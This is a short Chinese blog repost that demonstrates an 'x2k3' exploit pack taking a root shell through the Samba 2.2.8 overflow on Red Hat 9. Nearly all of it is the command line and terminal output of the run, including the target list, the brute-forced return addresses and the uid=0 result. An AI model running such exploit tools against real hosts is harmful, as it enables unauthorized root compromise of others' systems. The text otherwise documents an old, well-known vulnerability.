默认Samba版本在RedHat 9上的溢出获取root演示 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    Samba是在Redhat Linux 9上默认的版本,

默认Samba版本在RedHat 9上的溢出获取root演示

。使用了该 的强大的exploit工具提升为了root。

    提升为root,只需要短短的3秒钟

    自己汗一个

    从服务器的tmp查找到一个x2k3的目录

    [bob@learnin9 tmp]$ cd x2k3/

    [bob@learnin9 x2k3]$ ls

    bind ftp gkr identd r00t samba

    [bob@learnin9 x2k3]$

    bind ftp gkr identd samba均为目录,r00t为一个程序,让我们来看看r00t程序的执行情况

    [bob@learnin9 x2k3]$ ./r00t

    .--------------------------------.

    | x2k3 /

    | Written by Natok /

    +------------------------+----.

    | Targets: [1] Samba | <= 2.2.8

    | [2] Bind | 8.3.2 / 8.3.3 / 9.2.1

    | [3] gkrellmd | <2.1.12

    | [4] wu_ftpd | <=2.6.1

    | [5] identd | 1.2

    +------------------------+----.

    | http://www.natok.de /

    |____________________________/

    ./r00t

    [bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1

    [*] Range to scan : 127.0.0.0

    [*] Socket Connecting to port : 139

    [*] Press control+c for skipping !

    Port 139 IP 127.0.0.0 -> Connection refused!

    Port 139 IP 127.0.0.1 -> Connection ok!

    [+] Let's sploit ;-)

    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)

    --------------------------------------------------------------

    + Verbose mode.

    + Bruteforce mode. (Linux)

    + Host is running samba.

    + Using ret: [0xbffffed4]

    + Using ret: [0xbffffda8]

    + Using ret: [0xbffffc7c]

    + Using ret: [0xbffffb50]

    + Using ret: [0xbffffa24]

    + Using ret: [0xbffff8f8]

    + Using ret: [0xbffff7cc]

    + Using ret: [0xbffff6a0]

    + Using ret: [0xbffff574]

    + Using ret: [0xbffff448]

    + Using ret: [0xbffff31c]

    + Using ret: [0xbffff1f0]

    + Using ret: [0xbffff0c4]

    + Using ret: [0xbfffef98]

    + Using ret: [0xbfffee6c]

    + Using ret: [0xbfffed40]

    + Using ret: [0xbfffec14]

    + Using ret: [0xbfffeae8]

    + Using ret: [0xbfffe9bc]

    + Using ret: [0xbfffe890]

    + Using ret: [0xbfffe764]

    + Using ret: [0xbfffe638]

    + Using ret: [0xbfffe50c]

    + Using ret: [0xbfffe3e0]

    + Using ret: [0xbfffe2b4]

    + Using ret: [0xbfffe188]

    + Worked!

    --------------------------------------------------------------

    *** JE MOET JE MUIL HOUWE

    Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux

    uid=0(root) gid=0(root) groups=99(nobody)

    id

    uid=0(root) gid=0(root) groups=99(nobody)

    看到了吧,

电脑资料

默认Samba版本在RedHat 9上的溢出获取root演示》(https://www.unjs.com)。就这么轻易的被夺取为root了。

最新文章